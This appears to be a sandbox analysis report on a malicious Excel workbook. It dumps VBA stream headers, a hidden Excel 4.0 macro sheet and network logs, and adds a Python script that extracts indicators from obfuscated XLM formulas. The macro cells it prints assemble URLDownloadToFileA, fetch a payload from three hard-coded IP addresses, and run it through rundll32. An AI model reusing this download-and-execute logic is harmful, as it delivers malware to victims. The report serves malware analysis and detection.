                                                                                                                                                Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Class1"
                                                                                                                                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = False
                                                                                                                                                Attribute VB_Exposed = False
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = False
                                                                                                                                                VBA File Name: Class2.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class2
                                                                                                                                                VBA File Name:Class2.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Class2"
                                                                                                                                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = False
                                                                                                                                                Attribute VB_Exposed = False
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = False
                                                                                                                                                VBA File Name: Class3.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class3
                                                                                                                                                VBA File Name:Class3.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Class3"
                                                                                                                                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = False
                                                                                                                                                Attribute VB_Exposed = False
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = False
                                                                                                                                                VBA File Name: Kikide.cls, Stream Size: 1249
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Kikide
                                                                                                                                                VBA File Name:Kikide.cls
                                                                                                                                                Stream Size:1249
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords: False, VB_Exposed, Attribute, "Kikide", VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Kikide"
                                                                                                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                VBA File Name: UserForm1.frm, Stream Size: 1526
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/UserForm1
                                                                                                                                                VBA File Name:UserForm1.frm
                                                                                                                                                Stream Size:1526
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

VBA Code Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "UserForm1"
                                                                                                                                                Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = False
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = False
VBA File Name: Vrest.bas, Stream Size: 679
General
Stream Path: VBA/Vrest
VBA File Name: Vrest.bas
Stream Size: 679
                                                                                                                                                Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords: Attribute, "Vrest", VB_Name
                                                                                                                                                Attribute VB_Name = "Vrest"
VBA File Name: Vsewd.cls, Stream Size: 990
General
Stream Path: VBA/Vsewd
VBA File Name: Vsewd.cls
Stream Size: 990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, "Vsewd", VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
Attribute VB_Name = "Vsewd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Note: the VB_Base class ID {00020820-...} marks Vsewd as a worksheet document module (the module listed above it carries {00020819-...}, the workbook class). As with Vrest and UserForm1, the decompressed source dumped for this stream consists of attribute headers only; the download-and-execute logic of this sample lives in the hidden Excel 4.0 macro sheet shown further down, not in these VBA streams.

                                                                                                                                                Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
General
Stream Path: PROJECT
File Type: ASCII text, with CRLF line terminators
Stream Size: 856
Entropy: 5.31019504221
Base64 Encoded: True
Data ASCII (decoded, one entry per CRLF-terminated line): ID="{44817CA7-15DA-4D25-B4CE-470F9EA0E5DF}" / Document=Kikide/&H00000000 / Document=Briks/&H00000000 / Module=Byutut / Document=Vsewd/&H00000000 / Class=Class1 / Class=Class2 / Class=Class3 / Module=Blasr / Module=Vrest / Package={AC9F2F90-E877-11CE-9F68-00AA00574A4 (cut off in the report)
                                                                                                                                                Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
Stream Path: PROJECTwm, File Type: data, Stream Size: 209
General
Stream Path: PROJECTwm
File Type: data
Stream Size: 209
Entropy: 3.32661660177
Base64 Encoded: False
Data ASCII (decoded): Kikide, Briks, Byutut, Vsewd, Class1, Class2, Class3, Blasr, Vrest, UserForm1 (each module name is stored once as ANSI and once as UTF-16)
                                                                                                                                                Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
General
Stream Path: UserForm1/\x1CompObj
File Type: data
Stream Size: 97
Entropy: 3.61064918306
Base64 Encoded: False
Data ASCII (decoded): CompObj header, followed by the strings "Microsoft Forms 2.0 Form" (user type) and "Embedded Object" (clipboard format)
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
General
Stream Path: UserForm1/\x3VBFrame
File Type: ASCII text, with CRLF line terminators
Stream Size: 266
Entropy: 4.62034133633
Base64 Encoded: True
Data ASCII (decoded): VERSION 5.00 / Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm1 / Caption = "UserForm1" / ClientHeight = 3015 / ClientLeft = 120 / ClientTop = 465 / ClientWidth = 4560 / StartUpPosition = 1 'CenterOw (cut off in the report)
                                                                                                                                                Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
Stream Path: UserForm1/f, File Type: data, Stream Size: 38
General
Stream Path: UserForm1/f
File Type: data
Stream Size: 38
Entropy: 1.54052096453
Base64 Encoded: False
                                                                                                                                                Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
General
Stream Path: UserForm1/o
File Type: empty
Stream Size: 0
Entropy: 0.0
Base64 Encoded: False
Data ASCII: (empty)
Data Raw: (empty)
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
General
Stream Path: VBA/_VBA_PROJECT
File Type: data
Stream Size: 4263
Entropy: 4.38205341073
Base64 Encoded: False
Data ASCII (decoded, UTF-16 text after the binary header): *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7. (cut off in the report; this is the project's reference to the VBA 7.1 type library)
                                                                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
Stream Path: VBA/dir, File Type: data, Stream Size: 1024
General
Stream Path: VBA/dir
File Type: data
Stream Size: 1024
Entropy: 6.73319737871
Base64 Encoded: True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

The three lines of the original export are a cell-by-cell CSV dump of the hidden Excel 4.0 macro sheet. Below, empty cells are dropped and each non-empty cell is listed on its own line in the order it appears; the export does not preserve grid coordinates, so the references inside the formulas (Nyukasl!AI82, G12, I7 and so on) cannot be mapped back to the listed cells. Read together, the cells do the following: the fragments "URLDo", "wnloadT" and "oFileA" are joined by CONCATENATE into URLDownloadToFileA; REGISTER binds that export of uRlMon (urlmon.dll) under the attacker-chosen alias Belandes, with the REGISTER type text JJCCBB (return type first, then one code per argument; J is a 4-byte integer, C a null-terminated string); Belandes is then called with each of the three hard-coded URLs in turn, each retry guarded by the previous call returning a negative value (a failed HRESULT), writing the payload to ..\Ladfge.VDGfwr next to the document; if the last attempt also fails, CLOSE(0) closes the workbook without saving. Otherwise the string fragments "rund", "ll32 ..\Ladfge.VDGfwr,DllReg" and "isterServer" are joined and passed to EXEC, which runs rundll32 ..\Ladfge.VDGfwr,DllRegisterServer. ON.TIME defers a macro named Grestes by two seconds, and FORMULA(AG85&AG86&AG92,AI83) writes a formula assembled at runtime into AI83, so part of the sheet exists only while it executes.

Export block 1 (string fragments, API name assembly, URLs, payload path):
  =CONCATENATE(AG80,AH78,AG78,AG79)
  =CONCATENATE(AG81,AH78,AG78,AG79)
  1
  =CONCATENATE(AG82,AH78,AG78,AG79)
  9
  =ON.TIME(NOW()+"00:00:02","Grestes")
  .d
  =NOW()
  at
  =FORMULA(AG85&AG86&AG92,AI83)
  ="http://185.183.99.115/"
  =HALT()
  ="http://51.89.73.159/"
  ="http://190.14.37.38/"
  uRlMon
  JJCCBB
  ="URLDo"
  Belandes
  ="wnloadT"
  =GOTO(Blodas!G6)
  ..\Ladfge.VDGfwr
  ="oFileA"

Export block 2 (API registration and download chain with fallback):
  =REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)
  =Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)
  =IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))
  =IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))
  =IF(G14<0,CLOSE(0),)
  =GOTO(Jioka!H4)

Export block 3 (payload execution):
  ="rund"
  ="ll32 ..\Ladfge.VDGfwr,DllReg"
  ="isterServer"
  =PI()
  =EXEC(I7&I9&I10)
  =PI()
  =HALT()
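Because the macro splits the API name, the URLs and the rundll32 command line across cells and only joins them with CONCATENATE and &, a grep over the raw cell dump never sees "URLDownloadToFileA" or "rundll32". The script below is an added example, written for this page and not part of the Joe Sandbox report or of any tool it uses: it resolves the string-building subset of XLM (string literals, cell references including Sheet! prefixes, & and CONCATENATE), leaves everything else as symbolic call nodes, and then reports which DLL export REGISTER bound to which alias, every (URL, file path) pair passed through that alias, and every EXEC command line. The cell grid is constructed from the fragments in the report; since the export does not preserve coordinates, every cell address in it (AG80, AI83, G12, I7 and the rest) is an assumption.

```python
"""Resolve Excel 4.0 (XLM) string-building formulas and pull out the IOCs.
Added example, not part of the sandbox report or of any tool it uses; the grid
below is constructed from the report's fragments and every cell address in it is
an assumption, since the export does not preserve coordinates."""
import re

TOKEN_RE = re.compile(r'''(?P<str>"(?:[^"]|"")*")                   # "text", "" escapes a quote
    |(?P<ref>(?:[A-Za-z_][A-Za-z0-9_]*!)?\$?[A-Z]{1,3}\$?[0-9]+)  # Sheet!A1, $A$1, A1
    |(?P<name>[A-Za-z_.][A-Za-z0-9_.]*)|(?P<num>[0-9]+(?:\.[0-9]+)?)
    |(?P<op>[(),&<>=+-])|(?P<ws>\s+)|(?P<bad>.)''', re.VERBOSE)

def tokenize(text):
    toks = [(m.lastgroup, m.group()) for m in TOKEN_RE.finditer(text) if m.lastgroup != "ws"]
    if any(kind == "bad" for kind, _ in toks):
        raise ValueError(f"cannot tokenise {text!r}")
    return toks

class Parser:
    """Recursive-descent parser for the XLM subset these loaders rely on.
    Results are plain str, or symbolic tuples: ("call", name, [args]) for
    REGISTER/EXEC/IF/..., and ("binop", op, left, right) for e.g. G12<0."""
    def __init__(self, text, cells, depth):
        self.toks, self.i, self.cells, self.depth = tokenize(text), 0, cells, depth
    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)
    def take(self):
        tok = self.peek()
        self.i += 1
        return tok
    def expr(self):
        left = self.atom()
        while self.peek()[0] == "op" and self.peek()[1] in "&<>=+-":
            op, right = self.take()[1], self.atom()
            if op == "&" and isinstance(left, str) and isinstance(right, str):
                left = left + right            # fold concatenation of two known strings
            else:
                left = ("binop", op, left, right)   # comparisons etc. stay symbolic
        return left
    def atom(self):
        kind, val = self.take()
        if kind == "str":
            return val[1:-1].replace('""', '"')
        if kind == "ref":   # strip Sheet! prefix and $ anchors, then follow the reference
            return resolve(self.cells, val.split("!")[-1].replace("$", ""), self.depth + 1)
        if kind == "name" and self.peek() == ("op", "("):
            self.take()
            args = []
            while self.peek() != ("op", ")"):
                args.append("" if self.peek()[1] == "," else self.expr())   # keep empty slots
                if self.peek() == ("op", ","):
                    self.take()
            self.take()
            if val.upper() == "CONCATENATE" and all(isinstance(a, str) for a in args):
                return "".join(args)
            return ("call", val, args)
        if kind in ("num", "name"):
            return val      # number or bare defined name, kept as text
        raise ValueError(f"unexpected token {kind} {val!r}")

def resolve(cells, addr, depth=0):
    """Literal cells come back as-is; formula cells are parsed and partly evaluated."""
    if depth > 64:
        raise RecursionError(f"reference loop through {addr}")
    raw = cells.get(addr, "")
    return Parser(raw[1:], cells, depth).expr() if isinstance(raw, str) and raw.startswith("=") else raw

def walk(node):
    """Yield every ("call", ...) node nested anywhere inside a resolved value."""
    if isinstance(node, tuple) and node[0] == "call":
        yield node
        for a in node[2]:
            yield from walk(a)
    elif isinstance(node, tuple):          # ("binop", op, left, right)
        yield from walk(node[2])
        yield from walk(node[3])

def extract_iocs(cells):
    calls = [c for addr in cells for c in walk(resolve(cells, addr))]
    aliases, found = {}, {"registered": [], "downloads": [], "exec": []}
    for _, name, args in calls:          # pass 1: alias -> DLL!export bound by REGISTER
        if name.upper() == "REGISTER" and len(args) >= 4:
            aliases[str(args[3]).lower()] = f"{args[0]}!{args[1]}"
            entry = f"{args[0]}!{args[1]} as {args[3]}"
            if entry not in found["registered"]:
                found["registered"].append(entry)
    for _, name, args in calls:          # pass 2: downloads through the alias, and EXEC
        if aliases.get(name.lower(), "").lower().endswith("!urldownloadtofilea") and len(args) >= 3:
            if (args[1], args[2]) not in found["downloads"]:
                found["downloads"].append((args[1], args[2]))   # (szURL, szFileName)
        elif name.upper() == "EXEC" and args and args[0] not in found["exec"]:
            found["exec"].append(args[0])
    return found

# Constructed grid modelled on the report's fragments (all addresses are assumed).
CELLS = {
    "AG80": "URLDo", "AH78": "wnloadT", "AG78": "oFileA", "AG79": "",
    "AI82": "uRlMon", "AI84": "JJCCBB", "AI85": "Belandes", "AI75": "1",
    "AI83": "=CONCATENATE(AG80,AH78,AG78,AG79)",
    "AG74": '="http://185.183.99.115/"', "AG75": '="http://51.89.73.159/"',
    "AG76": '="http://190.14.37.38/"', "AI88": r"..\Ladfge.VDGfwr",
    "G11": "=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)",
    "G12": "=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)",
    "G13": "=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))",
    "G14": "=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))",
    "G15": "=IF(G14<0,CLOSE(0),)",
    "I7": '="rund"', "I9": r'="ll32 ..\Ladfge.VDGfwr,DllReg"', "I10": '="isterServer"',
    "I12": "=EXEC(I7&I9&I10)",
}

if __name__ == "__main__":
    for kind, items in extract_iocs(CELLS).items():
        for item in items:
            print(f"{kind:10} {item}")
```

To use it on a real sample, feed it the cell dictionary produced by an XLM extractor (address to raw cell text) instead of the constructed CELLS. The point of keying detection on the REGISTER binding rather than on the call sites is that the alias (Belandes here) is attacker-chosen and changes per build, whereas the binding to urlmon!URLDownloadToFileA followed by EXEC of a rundll32 command line is the behaviour that identifies this loader family.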

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID   Message                         Source Port  Dest Port  Source IP       Dest IP
05/04/21-19:07:41.801264  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49167      185.183.99.115  192.168.2.22
05/04/21-19:07:42.059316  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49168      51.89.73.159    192.168.2.22
05/04/21-19:07:43.241894  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49169      190.14.37.38    192.168.2.22

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
May 4, 2021 19:16:15.554132938 CEST  49718        80         192.168.2.3     185.183.99.115
May 4, 2021 19:16:15.622983932 CEST  80           49718      185.183.99.115  192.168.2.3
May 4, 2021 19:16:15.623096943 CEST  49718        80         192.168.2.3     185.183.99.115
May 4, 2021 19:16:15.623878956 CEST  49718        80         192.168.2.3     185.183.99.115
May 4, 2021 19:16:15.692529917 CEST  80           49718      185.183.99.115  192.168.2.3
May 4, 2021 19:16:15.891493082 CEST  80           49718      185.183.99.115  192.168.2.3
May 4, 2021 19:16:15.891654015 CEST  49718        80         192.168.2.3     185.183.99.115
May 4, 2021 19:16:15.899362087 CEST  49719        80         192.168.2.3     51.89.73.159
May 4, 2021 19:16:15.942394018 CEST  80           49719      51.89.73.159    192.168.2.3
